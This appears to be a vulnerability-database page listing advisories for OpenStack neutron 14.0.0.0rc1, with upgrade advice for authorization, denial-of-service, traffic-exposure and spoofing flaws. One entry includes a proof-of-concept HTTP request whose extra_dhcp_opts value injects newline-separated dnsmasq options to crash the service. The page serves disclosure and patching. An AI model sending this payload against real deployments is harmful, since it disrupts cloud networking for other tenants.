neutron@14.0.0.0rc1 vulnerabilities

neutron is an OpenStack project to provide “network connectivity as a service” between interface devices (e.g., vNICs) managed by other OpenStack services (e.g., nova). It implements the Neutron API.

Affected versions of this package are vulnerable to Improper Authorization when a non-admin user tries to list security groups for project_id None, it will create a default security group for that project and returns an empty list to the caller.

Upgrade neutron to version 21.0.0.0rc1 or higher.

neutron is an OpenStack project to provide “network connectivity as a service” between interface devices (e.g., vNICs) managed by other OpenStack services (e.g., nova). It implements the Neutron API.

Affected versions of this package are vulnerable to Denial of Service (DoS) via the routes middleware. By making API requests involving nonexistent controllers, an authenticated user may cause the API worker to consume increasing amounts of memory, resulting in API performance degradation or denial of service.

Upgrade neutron to version 16.4.1, 17.2.1, 18.1.1 or higher.

neutron is an OpenStack project to provide “network connectivity as a service” between interface devices (e.g., vNICs) managed by other OpenStack services (e.g., nova). It implements the Neutron API.

Affected versions of this package are vulnerable to Denial of Service (DoS). By supplying a specially crafted extra_dhcp_opts value, an authenticated user may add arbitrary configuration to the dnsmasq process in order to crash the service, change parameters for other tenants sharing the same interface, or otherwise alter that daemon's behavior.

PoC

// A payload to crash dnsmasq
PUT /v2.0/ports/9db67e0f-537c-494a-a655-c8a0c518d57e HTTP/1.1
Host: openstack
X-Auth-Token: TOKEN
Content-Type: application/json
Content-Length: 170

{"port":{
"extra_dhcp_opts":[{"opt_name":"zzz",
"opt_value":"xxx\n128,aa:bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb\n120,aa.cc\n128,:"
}]}}

Upgrade neutron to version 16.4.1, 17.2.1, 18.1.1 or higher.

neutron is an OpenStack project to provide “network connectivity as a service” between interface devices (e.g., vNICs) managed by other OpenStack services (e.g., nova). It implements the Neutron API.

Affected versions of this package are vulnerable to Information Exposure. During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports that are administratively down, even between tenants self-service networks. This allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node.

Upgrade neutron to version 18.0.0 or higher.

neutron is an OpenStack project to provide “network connectivity as a service” between interface devices (e.g., vNICs) managed by other OpenStack services (e.g., nova). It implements the Neutron API.

Affected versions of this package are vulnerable to Denial of Service (DoS). Anyone in control of a server instance may send carefully crafted packets and impersonate the hardware addresses of other network components. This may also allow interception of traffic in some cases.

Upgrade neutron to version 18.1.0, 17.2.1, 16.4.1 or higher.